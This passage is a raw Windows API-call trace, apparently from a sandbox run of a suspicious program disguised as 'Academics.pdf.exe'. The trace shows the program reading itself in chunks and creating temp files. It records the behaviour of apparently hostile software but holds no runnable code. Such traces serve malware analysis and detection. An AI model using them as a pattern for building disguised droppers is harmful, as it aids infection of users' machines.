| out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.199] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bedf8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedf8) returned 0 [0133.200] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0133.201] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bec38 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.201] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.202] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.202] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.202] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.202] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.202] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.202] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.202] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.202] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.202] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.204] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\rngoajj", lpFindFileData=0x8bee68 | out: lpFindFileData=0x8bee68*(dwFileAttributes=0x2498fe0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0xa, ftLastAccessTime.dwLowDateTime=0x8, ftLastAccessTime.dwHighDateTime=0x8bee8c, ftLastWriteTime.dwLowDateTime=0x4131ac, ftLastWriteTime.dwHighDateTime=0x2498fe0, nFileSizeHigh=0x0, nFileSizeLow=0x7715e36c, dwReserved0=0x77aa18e1, dwReserved1=0x2498e48, cFileName="\x19c\x25c", cAlternateFileName="\x10")) returned 0xffffffff [0133.204] PeekMessageW (in: lpMsg=0x8bf2d8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf2d8) returned 0 [0133.204] PeekMessageW (in: lpMsg=0x8bf7b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7b8) returned 0 [0133.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8be9ac, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0133.204] GetFileType (hFile=0x160) returned 0x1 [0133.204] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.206] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0133.206] SetFilePointer (in: hFile=0x160, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0133.206] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.206] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0133.207] SetFilePointer (in: hFile=0x160, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0133.207] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.207] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffd8 [0133.207] SetFilePointer (in: hFile=0x160, lDistanceToMove=196548, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ffc4 [0133.207] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.208] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffc4 [0133.208] SetFilePointer (in: hFile=0x160, lDistanceToMove=262064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ffb0 [0133.208] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.209] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ffb0 [0133.209] SetFilePointer (in: hFile=0x160, lDistanceToMove=327580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ff9c [0133.209] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.209] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff9c [0133.210] SetFilePointer (in: hFile=0x160, lDistanceToMove=393096, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ff88 [0133.210] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.210] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff88 [0133.210] SetFilePointer (in: hFile=0x160, lDistanceToMove=458612, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ff74 [0133.210] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.211] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff74 [0133.211] SetFilePointer (in: hFile=0x160, lDistanceToMove=524128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7ff60 [0133.211] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.212] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff60 [0133.212] SetFilePointer (in: hFile=0x160, lDistanceToMove=589644, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8ff4c [0133.212] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.212] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff4c [0133.213] SetFilePointer (in: hFile=0x160, lDistanceToMove=655160, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ff38 [0133.213] ReadFile (in: hFile=0x160, lpBuffer=0x8aeac4, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8ae9b0, lpOverlapped=0x0 | out: lpBuffer=0x8aeac4*, lpNumberOfBytesRead=0x8ae9b0*=0x10000, lpOverlapped=0x0) returned 1 [0133.213] SetFilePointer (in: hFile=0x160, lDistanceToMove=685588, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7614 [0133.213] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1000) returned 0x241fed8 [0133.213] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x8ae994, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ae994*=0x1000, lpOverlapped=0x0) returned 1 [0133.213] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8be9c4 | out: lpSystemTimeAsFileTime=0x8be9c4*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.213] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8614 [0133.214] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\rngoajj" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\rngoajj")) returned 0xffffffff [0133.214] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\rngoajj", lpFindFileData=0x8bea30 | out: lpFindFileData=0x8bea30*(dwFileAttributes=0xc0, ftCreationTime.dwLowDateTime=0x8bea40, ftCreationTime.dwHighDateTime=0x41af1a, ftLastAccessTime.dwLowDateTime=0x25c0abc, ftLastAccessTime.dwHighDateTime=0x8bea80, ftLastWriteTime.dwLowDateTime=0x41e2c6, ftLastWriteTime.dwHighDateTime=0x3, nFileSizeHigh=0x41e2bc, nFileSizeLow=0x6ad1c127, dwReserved0=0x4900b0, dwReserved1=0x3, cFileName="", cAlternateFileName="")) returned 0xffffffff [0133.214] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8adaa4 | out: lpSystemTimeAsFileTime=0x8adaa4*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.214] SetFilePointer (in: hFile=0x160, lDistanceToMove=685608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa7628 [0133.214] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad568, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ad568*=0x200, lpOverlapped=0x0) returned 1 [0133.214] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.214] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.214] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.215] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa7828 [0133.215] SetFilePointer (in: hFile=0x160, lDistanceToMove=685749, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa76b5 [0133.215] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad568, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ad568*=0x200, lpOverlapped=0x0) returned 1 [0133.215] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa78b5 [0133.215] SetFilePointer (in: hFile=0x160, lDistanceToMove=704599, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xac057 [0133.215] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad568, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ad568*=0x200, lpOverlapped=0x0) returned 1 [0133.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.215] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xac257 [0133.215] SetFilePointer (in: hFile=0x160, lDistanceToMove=704706, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xac0c2 [0133.216] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad568, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ad568*=0x200, lpOverlapped=0x0) returned 1 [0133.216] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xac2c2 [0133.216] SetFilePointer (in: hFile=0x160, lDistanceToMove=753613, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb7fcd [0133.216] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad568, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ad568*=0x200, lpOverlapped=0x0) returned 1 [0133.216] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.216] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.216] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.216] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb81cd [0133.216] SetFilePointer (in: hFile=0x160, lDistanceToMove=753720, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb8038 [0133.216] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad568, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ad568*=0x200, lpOverlapped=0x0) returned 1 [0133.217] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb8238 [0133.217] SetFilePointer (in: hFile=0x160, lDistanceToMove=804849, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc47f1 [0133.217] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad568, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ad568*=0x200, lpOverlapped=0x0) returned 1 [0133.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.217] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.217] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc49f1 [0133.217] SetFilePointer (in: hFile=0x160, lDistanceToMove=804960, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc4860 [0133.217] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad568, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ad568*=0x200, lpOverlapped=0x0) returned 1 [0133.217] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc4a60 [0133.217] SetFilePointer (in: hFile=0x160, lDistanceToMove=914502, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xdf446 [0133.218] ReadFile (in: hFile=0x160, lpBuffer=0x241fed8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x8ad568, lpOverlapped=0x0 | out: lpBuffer=0x241fed8*, lpNumberOfBytesRead=0x8ad568*=0x200, lpOverlapped=0x0) returned 1 [0133.218] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.218] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.218] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ad554 | out: lpSystemTimeAsFileTime=0x8ad554*(dwLowDateTime=0x58b46d0, dwHighDateTime=0x1d509d7)) [0133.218] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8ad8b8 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0133.218] GetTempFileNameW (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString="aut", uUnique=0x0, lpTempFileName=0x8adf78 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\autDAA5.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\autdaa5.tmp")) returned 0xdaa5 [0133.219] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d50 [0133.219] CreateFileW 